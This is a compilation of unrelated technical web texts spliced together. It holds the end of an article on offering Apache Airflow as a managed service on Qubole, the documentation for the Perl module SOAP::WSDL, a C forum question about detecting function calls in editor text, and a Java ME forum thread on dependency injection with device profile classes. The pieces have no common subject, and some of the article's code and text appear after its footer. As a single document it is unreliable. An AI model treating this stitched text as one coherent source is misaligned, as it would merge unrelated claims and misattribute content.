Airflow automatically uploads task logs to S3 after the task run has finished. However, it relies on the user having set up proper access/secret keys, and so on. As we already have these keys present on the Airflow cluster, we replaced the open-source code with our own and made sure that task logs got uploaded properly. We made a similar change for when logs are fetched from S3. This process is even more effective if users are using IAM roles. By default, we also set a cron to periodically upload service logs (webserver, scheduler, workers, rabbitmq) to S3.

7. Using Monit to Manage Services and Monitoring

We were able to use Monit successfully for monitoring and restarting services. We also used it to send us alert messages in the event a service could not be started at all.
It also gave us some simple commands to manage Airflow services, like:

Monit start/stop/restart webserver/scheduler/worker

8. Qubole Goodies

As with any other big data engine, a Qubole-Airflow integration automatically entitles users to Qubole goodies. These include:

- Single-click cluster start and stop
- Support for IAM roles
- Ability to log in via username-password, GAuth, or via a dozen different SAML providers
- Ability to launch clusters in a VPC
- Customizing the environment via node bootstraps

In Summary

I'd like to give a big thanks to the Airbnb team, the core committers, my colleague Yogesh, and Airbnb for open sourcing such beautiful software. Even a person like me, who had never coded in Python before, was able to contribute to the project and customize it.

Core committers Max, Bolke, Siddharth, and Chris: for reviewing a bunch of open source PRs and helping in the integration of Qubole with Airflow.
Yogesh: for being involved from the evaluation of Airflow as the preferred choice through doing the GA as a managed service.

Published at DZone with permission of Sumit Maheshwari, DZone MVB. See the original article here. Opinions expressed by DZone contributors are their own.
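The Qubole/Airflow reconciliation described in section 5 boils down to a small decision: on an Airflow-reported failure, trust the backend's command status over what the scheduler assumed. A self-contained sketch of that logic (the class names and status strings are illustrative stand-ins, not Qubole's actual SDK):

```python
# Hypothetical stand-ins for a Qubole command handle and an Airflow task instance.
class Command:
    def __init__(self, status):
        self.status = status      # e.g. 'done', 'error', 'running'
        self.cancelled = False

    def cancel(self):
        # Kill the command on the backend.
        self.cancelled = True

class TaskInstance:
    def __init__(self):
        self.state = None         # 'success' or 'failed'

def reconcile_on_failure(ti, cmd):
    """Called from a failure hook: reconcile Airflow's view with the backend's."""
    if cmd.status == 'done':
        # The backend says the command succeeded; override the zombie 'failed' state.
        ti.state = 'success'
    elif cmd.status == 'running':
        # Still running on the backend: kill it there and keep the TI failed.
        cmd.cancel()
        ti.state = 'failed'
    else:
        # Genuine failure on both sides.
        ti.state = 'failed'
    return ti.state
```

In the real system this runs inside Airflow's on_failure/on_retry callbacks, with the command ID fetched via XCom as described in section 3.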
https://dzone.com/articles/the-fun-of-creating-apache-airflow-as-a-service?fromrel=true
- NAME
- SYNOPSIS
- DESCRIPTION
- USAGE
- How it works
- Caching
- Methods
- Notes
- LIMITATIONS
- CAVEATS
- BUGS
- TODO
- CHANGES
- AUTHOR

NAME

SOAP::WSDL

SYNOPSIS

use SOAP::WSDL;
my $soap=SOAP::WSDL->new( wsdl => '' )
    ->proxy( '');
$soap->wsdlinit;
my $som=$soap->call( 'method' => [ { name => value }, { name => 'value' } ]);

DESCRIPTION

SOAP::WSDL provides decent WSDL support for SOAP::Lite. It is built as an add-on to SOAP::Lite, and will sit on top of it, forwarding all the actual request-response work to SOAP::Lite - somewhat like a pre-processor.

WSDL support means that you don't have to deal with those bitchy namespaces some web services set on each and every method call parameter. It also means an end to that nasty

SOAP::Data->name( 'Name' )->value( SOAP::Data->name( 'Sub-Name')->value( 'Subvalue' ) );

encoding of complex data. (Another solution for this problem is just iterating recursively over your data. But that doesn't work if you need more information [e.g. namespaces etc] than just your data to encode your parameters.)

And it means that you can use ordinary hashes for your parameters - the encoding order will be derived from the WSDL and not from your (unordered) data, thus the problem of unordered perl hashes and WSDL <sequence> definitions is solved, too. (Another solution for the ordering problem is tying your hash to a class that provides ordered hashes - Tie::IxHash is one of them.)

Why should I use this ?

SOAP::WSDL eases life for webservice developers who have to communicate with lots of different web services using a reasonably big number of method calls. If you just want to call a handful of methods of one web service, take SOAP::Lite's stubmaker and modify the stuff by hand if it doesn't work right from the start. The overhead SOAP::WSDL imposes on your calls is not worth the time saving. If you need to access many web services offering zillions of methods to you, this module should be your choice.
It automatically encodes your perl data structures correctly, based on the service's WSDL description, handling even those complex types SOAP::Lite can't cope with. SOAP::WSDL also eliminates most perl <-> .NET interoperability problems by qualifying methods and parameters as they are specified in the WSDL definition.

USAGE

my $soap=SOAP::WSDL->new( wsdl => '' );
# or
my $soap=SOAP::WSDL->new()
$soap->wsdl('');
# or
# without dispatching calls to the WebService
#
# useful for testing
my $soap=SOAP::WSDL->new( wsdl => '', no_dispatch => 1 );

# you must call proxy before you call wsdlinit
$soap->proxy( '')

# optional (only necessary if the service you use is not the first one
# in document order in the WSDL file).
# If used, it must be called before wsdlinit.
$soap->servicename('Service1');

# optional, set to a false value if you don't want your
# soap message elements to be typed
$soap->autotype(0);

# never forget to call this !
$soap->wsdlinit;

# with caching enabled:
$soap->wsdlinit( caching => 1);

my $som=$soap->call( 'method'
    , name => 'value'
    , name => 'value' );

How it works

SOAP::WSDL takes the wsdl file specified and looks up the port for the service. On calling a SOAP method, it looks up the message encoding and wraps all the stuff around your data accordingly. Most pre-processing is done in wsdlinit; the rest is done in call, which overrides the same method from SOAP::Lite.

wsdlinit

SOAP::WSDL loads the wsdl file specified by the wsdl parameter / call using SOAP::Lite's schema method. It sets up an XPath object of that wsdl file, and subsequently queries it for namespaces, service, and port elements. The port you are using is deduced from the URL you're going to connect to. SOAP::WSDL uses the first service (in document order) specified in the wsdl file.
If you want to choose a different one, you can specify the service by calling

$soap->servicename('ServiceToUse');

If you want to specify a service name, do it before calling wsdlinit - it has no effect afterwards.

call

The call method examines the wsdl file to find out how to encode the SOAP message for your method. Lookups are done in real-time using XPath, so this incorporates a small delay to your calls (see "Memory consumption and performance" below). The SOAP message will include the types for each element, unless you have set autotype to a false value by calling

$soap->autotype(0);

After wrapping your call into what is appropriate, SOAP::WSDL uses the call() method from SOAP::Lite to dispatch your call. call takes the method name as first argument, and the parameters passed to that method as following arguments. Example:

$som=$soap->call( "SomeMethod" => "test" => "testvalue" );
$som=$soap->call( "SomeMethod" => %args );

Caching

SOAP::WSDL uses a two-stage caching mechanism to achieve best performance. First, there's a pretty simple caching mechanism for storing XPath query results. They are just stored in a hash with the XPath path as key (until recently, only results of "find" or "findnodes" were cached). I did not use the obvious Cache or Cache::Cache module here, because these use Storable to store complex objects and thus incorporate a performance loss heavier than using no cache at all.

Second, the XPath object and the XPath results cache can be stored on disk using the Cache::FileCache implementation. A filesystem cache is only used if you 1) enable caching and 2) set wsdl_cache_directory. The cache directory must be, of course, read- and writeable.

XPath result caching doubles performance, but increases memory consumption - if you are short of memory, you should not enable caching (disabled by default). Filesystem caching triples performance for wsdlinit and doubles performance for the first method call.
The file system cache is written to disk when the SOAP::WSDL object is destroyed. It may be written to disk at any time by calling the "wsdl_cache_store" method. Using both filesystem and in-memory caching is recommended for best performance and smallest startup costs.

Sharing cache between applications

Sharing a file system cache among applications accessing the same web service is generally possible, but may under some circumstances reduce performance, and under some special circumstances even lead to errors. This is due to the cache key algorithm used. SOAP::WSDL uses the SOAP endpoint URL as the key to store the XML::XPath object of the wsdl file. In the rare case of a web service listening on one particular endpoint (URL) but using more than one WSDL definition, this may lead to errors when applications using SOAP::WSDL share a file system cache.

SOAP::WSDL stores the XPath results in-memory cache in the filesystem cache, using the key of the wsdl file with _cache appended. Two applications sharing the file system cache and accessing different methods of one web service could overwrite each other's in-memory caches when dumping the XPath results to disk, resulting in a slight performance drawback (even though this only happens in the rare case of one app being started before the other one has had a chance to write its cache to disk).

Controlling the file system cache

If you want full control over the file system cache, you can use wsdl_init_cash to initialize it. wsdl_init_cash will take the same parameters as Cache::FileCache->new(). See Cache::Cache and Cache::FileCache for details.
Methods - call $soap->call($method, %data); See above. call will die if it can't find required elements in the WSDL file or if your data doesn't meet the WSDL definition's requirements, so you might want to eval{} it. On death, $@ will (hopefully) contain some error message like Error processing WSDL: no <definitions> element found to give you a hint about what went wrong. - no_dispatch Gets/Sets the no_dispatch flag. If no_dispatch is set to true value, SOAP::WSDL will not dispatch your calls to a remote server but return the SOAP::SOM object containing the call instead. Useful for testing / debugging - encode # this is how call uses encode # $xpath contains a XPath object of the wsdl document my $def=$xpath->find("/definitions")->shift; my $parts=$def->find("//message[\@name='$messageName']/part"); my @param=(); while (my $part=$parts->shift) { my $enc=$self->encode($part, \%data); push @param, $enc if defined $enc; } Does the actual encoding. Expects a XPath::NodeSet as first, a hashref containing your data as second parameter. The XPath nodeset must be a node specifying a WSDL message part. You won't need to call encode unless you plan to override call or want to write a new SOAP server implementation. - servicename $soap->servicename('Service1'); Use this to specify a service by name (if none specified, the first one in document order from the WSDL file is used). You must call this before calling "wsdlinit". - wsdl $soap->wsdl(''); Use this to specify the WSDL file to use. Must be a valid (and accessible !) url. You must call this before calling "wsdlinit". For time saving's sake, this should be a local file - you never know how much time your WebService needs for delivering a wsdl file. - wsdlinit $soap->wsdlinit( caching => 1, cache_directory => '/tmp/cache' ); Initializes the WSDL document for usage and looks up the web service and port to use (the port is derived by the URL specified via SOAP::Lite's proxy method). 
wsdlinit will die if it can't set up the WSDL file properly, so you might want to eval{} it. On death, $@ will (hopefully) contain an error message like

    Error processing WSDL: no <definitions> element found

to give you a hint about what went wrong.

wsdlinit accepts a hash of parameters with the following keys:

    caching            enables caching if set to a true value
    cache_directory    enables file system caching (in the directory
                       specified). The directory given must exist and be
                       readable and writable.

- wsdl_cache_directory

    $soap->wsdl_cache_directory('/tmp/cache');

Sets the directory used for file system caching and enables file system caching. Passing the cache_directory parameter to wsdlinit has the same effect.

- wsdl_cache_store

    $soap->wsdl_cache_store();

Stores the content of the in-memory cache (and the XML::XPath representation of the WSDL file) to disk. This has no effect if cache_directory is not set.

Notes

Why another SOAP module?

SOAP::Lite provides only rudimentary WSDL support. This lack is not just something unimplemented, but an offspring of the SOAP::Schema class design. SOAP::Schema uses a complicated format to store XML Schema information (mostly a big hashref containing arrays of SOAP::Data and a SOAP::Parser-derived object). This data structure makes it pretty hard to improve SOAP::Lite's WSDL support.

SOAP::WSDL uses XPath for processing WSDL. XPath is a query language standard for XML, and usually a good choice for XML transformations or XML template processing (and what else is WSDL-based encoding and decoding?). Besides, there's an excellent XPath module (XML::XPath) available from CPAN, and as SOAP::Lite uses XPath to access elements in SOAP::SOM objects, this seems like a natural choice. Fiddling the kind of WSDL support implemented here into SOAP::Lite would mean a larger set of changes, so I decided to build something to use as an add-on.
Memory consumption and performance

SOAP::WSDL uses around twice the memory (or even more) that SOAP::Lite uses for the same task (but remember: SOAP::WSDL does things for you that SOAP::Lite can't). It imposes a slight delay for initialization, and for every SOAP method call, too.

On my 1.4 GHz Pentium mobile notebook, the init delay with a simple WSDL file (containing just one operation and some complex types and elements) was around 50 ms, the delay for the first call around 25 ms, and for subsequent calls to the same method around 7 ms without and around 6 ms with XPath result caching (on caching, see above). XML::XPath must do some caching, too - I don't know where else the speedup would come from.

Calling a method of a more complex WSDL file (defining around 10 methods and numerous complex types on around 500 lines of XML), the delay was around 100 ms for the first and 70 ms for subsequent method calls. wsdlinit took around 150 ms to process the file. With XPath result caching enabled, all but the first call take around 35 ms.

Using SOAP::WSDL on an idiotically complex WSDL file with just one method, but around 100 parameters for that method, mostly made up of extensions of complex types (the heaviest XPath operation), takes around 1.2 s for the first call (0.9 s with caching) and around 830 ms for subsequent calls (around 570 ms with caching).

The actual performance loss compared to SOAP::Lite should be around 10% less than the values above - SOAP::Lite encodes the data for you, too (or you do it yourself), and encoding in SOAP::WSDL is already covered by the pre-call delay times mentioned above.

If you have lots of web service methods and call each of them from time to time, this delay should not affect your performance too much. If you have just one method and keep calling it over and over again, you should consider hardcoding your data encoding (maybe even with hardcoded XML templates - yes, this may be a BIG speedup).
LIMITATIONS

<restriction>

SOAP::WSDL doesn't handle <restriction> WSDL elements yet.

bindings

SOAP::WSDL does not care about port bindings yet.

overloading

WSDL overloading is not supported yet.

CAVEATS

API change between 1.13 and 1.14

The SOAP::WSDL API changed significantly between versions 1.13 and 1.14. From 1.14 on, call expects the following arguments: the method name as a scalar first, followed by the method parameters as a hash. call no longer recognizes the dispatch option - to get the same behaviour, pass no_dispatch => 1 to new, or call

    $soap->no_dispatch(1);

Unstable interface

This is alpha software - everything may (and most things will) change. But you don't have to be too afraid - at least the call synopsis should be stable from 1.14 on, and that is the part you'll use most frequently.

BUGS

Check for the correct number of elements is confused by complex types

If a complex type is marked optional in a WSDL file, but sub-parts are marked as required, SOAP::WSDL will die if the complex type is not found in the data (because it checks only for the occurrence of simple type elements). A quick-and-dirty workaround is to turn off the check with

    $soap->wsdl_checkoccurs(0);

Arrays of complex types are not checked for the correct number of elements

Arrays of complex types are just encoded and not checked for correctness. I don't know if I do this right yet, but the output looks good. However, they are not checked for the correct number of elements (does the SOAP spec say how to specify this?).

+trace (and other SOAP::Lite flags) don't work

This may be an issue with older versions of the base module (before 2.?), or with ActiveState's ActivePerl, which do not call the base module's import method with the flags supplied to the parent. There's a simple workaround:

    use SOAP::WSDL;
    import SOAP::Lite +trace;

nothing else known

But I'm sure there are some serious bugs lurking around somewhere.

TODO

- Implement bindings support

WSDL bindings are required for SOAP authentication.
This is not too hard to implement - just look up the bindings and decide for each (top-level) element whether to put it into the header or the body.

- Allow use of alternative XPath implementations

XML::XPath is a great module, but it's not a race-winning one. XML::LibXML offers a promising-looking XPath interface. SOAP::WSDL should support both, defaulting to the faster one, and leaving the final choice to the user.

CHANGES

$Log: WSDL.pm,v $

Revision 1.20 2004/07/29 06:56:45 lsc
- removed "use" dependency on Cache::FileCache, require'ing it instead

Revision 1.19 2004/07/27 13:00:03 lsc
- added missing test file

Revision 1.18 2004/07/16 07:43:05 lsc
- fixed test scripts for windows

Revision 1.17 2004/07/05 08:19:49 lsc
- added wsdl_checkoccurs

Revision 1.16 2004/07/04 09:01:14 lsc
- change <definitions> element lookup from find('/definitions') and find('wsdl:definitions') to find('/*[1]') to process arbitrary default (wsdl) namespaces correctly
- fixed test output in test 06

Revision 1.15 2004/07/02 12:28:31 lsc
- documentation update
- cosmetics

Revision 1.14 2004/07/02 10:53:36 lsc
- API change:
  - call now behaves (almost) like SOAP::Lite::call
  - call() takes a list (hash) as second argument
  - call does no longer support the "dispatch" option
  - dispatching calls can be suppressed by passing "no_dispatch => 1" to new()
  - dispatching calls can be suppressed by calling $soap->no_dispatch(1); and re-enabled by calling $soap->no_dispatch(0);
- Updated test skripts to reflect API change.
Revision 1.13 2004/06/30 12:08:40 lsc
- added IServiceInstance (ecmed) to acceptance tests
- refined documentation

Revision 1.12 2004/06/26 14:13:29 lsc
- refined file caching
- added descriptive output to test scripts

Revision 1.11 2004/06/26 07:55:40 lsc
- fixed "freeze" caching bug
- improved test scripts to test file system caching (and show the difference)

Revision 1.10 2004/06/26 06:30:33 lsc
- added filesystem caching using Cache::FileCache

Revision 1.9 2004/06/24 12:27:23 lsc
- cleanup

Revision 1.8 2004/06/11 19:49:15 lsc
- moved .t files to more self-describing names
- changed WSDL.pm to accept AXIS wsdl files
- implemented XPath query result caching on all absolute queries

Revision 1.7 2004/06/07 13:01:16 lsc
- added changelog to pod

(c) 2004 Martin Kutter

This library is free software; you can use it under the same terms as Perl itself.

AUTHOR

Martin Kutter <martin.kutter@fen-net.de>
https://metacpan.org/pod/release/MKUTTER/SOAP-WSDL-1.20/WSDL.pm
I have a small problem in a little project I'm doing that attempts to accurately detect function calls (not definitions) in an editor window. I only have access to the lines of text in the editor (e.g. Editor->GetLineText()), so I've written a few routines for tokenising a line, removing newlines, and concatenating lines until I receive a semicolon, just in case a call spans more than one line. Now I need an accurate way of detecting what is a function call. I don't want to use a full lexical analyser, as it seems overkill, and I've no interest in understanding what the written code does, don't care about casts, etc.

I was thinking of the following: a non-reserved name followed immediately by an opening bracket is a function call, with the name being the name of the function. This should exclude stuff like "for(", "switch(" and "if(" for example, but I'm concerned that it'll fall over with function pointers:

    float (*GetPtr1(const char opCode))(float, float)

Maybe if I check for the asterisk before the name, that'll cure it. Any suggestions?

Oh, and I'm posting this here because I don't care about parsing C++ code, so no need to worry about namespaces or classes. All code is standard ANSI-compliant C (apart from the parser itself, which is all C++).
http://cboard.cprogramming.com/c-programming/115954-accurately-detecting-function-calls-printable-thread.html
Dependency Injection?

Hello all,

Yes, that compiles. DI != Spring. This also compiles correctly: Spring.contains(DI). I could reference Pico instead of Spring when I discuss this, but I'm not sure what you're trying to tell me. Basically what I have is pure dependency injection managed by a build-time XSLT transform. Are you saying my solution can be simpler, or that I shouldn't be looking for an entire Spring framework for Mobile? I can agree with either point, but I'd want more detail on the former.

I am not an expert on this topic, but I was contacted by Christopher Judd of a while back. He has developed a Spring framework for Java ME and was interested in working with the open source community. I haven't heard about the project lately, but I pinged him on the topic. I might have more on this shortly.

-- Terrence

Hi Cliff76,

Read your blog, and well, there are some points that I would like to correct you on. While ME does not have a classloader, you can use Class.forName(), and it is very useful. As for T.D.D. (test-driven design), I don't see where there are large hurdles. Most of the ME code (minus UI) can be run on the desktop and tested, and with some of the ME2SE projects you can even run the UIs. I think CqME is a testing framework for ME, and can be found at cqme.dev.java.net.

I have not heard of a Spring-like framework for ME; however, I have two projects at Java.net that might help address the items you mentioned. The first (MicroBus) is an EDA (event-driven architecture)-ish component that might give you some ideas for your decoupling needs. The second is the MDO project, which helps decompose objects into their parts for persistence or transmission over the wire to back-end servers (the most recent code, MDO2, is more up to date).

But to your point that ME is not a cakewalk, I will agree, and that early optimization is bad, I would agree more. But heavy OOD is really bad for ME... and I would contend anywhere. ;) ....Bet I get flamed for that...
Regards,
-Shawn

Thanx for the reply, Shawn. I'm going to look into those two projects you mentioned. In the interim, I'm trying to find out how to address assembling or wiring the app after it's been decomposed. In other words, I have a completely decoupled architecture, right? None of the components instantiate any dependencies. Something has to put the thing together, doesn't it? I could write a Java class that just pulled everything together, but then when certain components need changing I'd have to edit this class and put in the new dependency, wouldn't I?

I guess what I'm really asking is whether there is really any need for my Fallframework, or if I'm over-complicating something simple. Is there another way to pull the dependency details out of code and into the build? What I'm ultimately trying to get is a way to build for different deployment targets (i.e. emulator, BlackBerry, Nokia, Motorola, etc.) by supplying a profile sheet. I think of a profile sheet almost as a list of ingredients (or actual concrete instances) that go into the finished product.

I will buy the fact that heavy OOD is bad for ME, and that's really not my goal. I'm only after a good and completely decoupled design that may or may not follow all of the rules of OOD. Am I making any sense, or do I sound more confusing and ambiguous than anything? Thanx again for responding.

Cliff

Cliff,

Your need for a profile sheet is spot on. Having some part of the code that defines the special parts of a device, then built into a finished (I'm inferring) device-specific deployment, sounds similar to how I'm looking at the problem too. I'm working on something like this, but I'm looking at a very basic solution using interfaces, class loading by name, and a build script that adjusts to pull the correct device profile. While I can't go into deep details (NDA with my employer), I can address the basic concept.
    public interface Profile {
        public String getStrInfo(String _key);
    }

    public class BBProfile implements Profile {
        // static, so the static initializer below can populate it
        private static Properties bbData = new Properties();
        static {
            bbData.put("stuff", "BBProfile stuff");
        }
        public String getStrInfo(String _key) {
            return (String) bbData.get(_key);
        }
    }

    public class NokiaProfile implements Profile {
        private static Properties nkData = new Properties();
        static {
            nkData.put("stuff", "NokiaProfile stuff");
        }
        public String getStrInfo(String _key) {
            return (String) nkData.get(_key);
        }
    }

    public class MyMidlet {
        private String profClass = System.getProperty("profClass");
        private Profile p;
        {
            try {
                // forName/newInstance throw checked exceptions
                p = (Profile) Class.forName(profClass).newInstance();
            } catch (Exception e) {
                // fall back to a default profile or report the error
            }
        }
    }

So here the property value "profClass" would be in the descriptor file, set to whatever the build was for BB or Nokia devices; the build would then only need to include, from the profile package, the classes whose names start with BB or Nokia. So in the end you only have the profile class that is correct for the device in the jar, and loaded. But when you pull the information from the profile, it is only that which was set in the static section of the device-specific profile.

Who knows if you are making it more complicated, but I feel you are thinking about a problem that most folks look at and say "device fragmentation sucks, why can't they make all devices the same" and then walk away. Well, innovation and competition are why there is fragmentation, and I would say innovation is great. Sure, fragmentation sucks, but, as we are, do something about it. So keep on with your project; you may solve this or other problems in a unique way. Others may not like your way, and so they come up with another, maybe even better, solution... cool, now we have two solutions. Again, innovation is good. :)

BTW: I think Jpolish has some type of reflection code generation at compile time thing... but I don't like solutions that require additional preprocessors.
Feels too much like 'C', and in the end it messes up the code so that you have to have some elaborate build environment instead of being able to use your favorite IDE or command-line tools. But then again, it's just another way of looking at the problem. To each their own.

Best regards,
-Shawn

I wanted to include a little more detail on what I'm looking for. See my weblog for details on my experimental project that attempts to bring the Spring framework to Java ME:

DI != Spring; it can be much simpler than that. I've never done anything in ME, but I think the PicoContainer "philosophy" fits ME better:
https://www.java.net/node/670236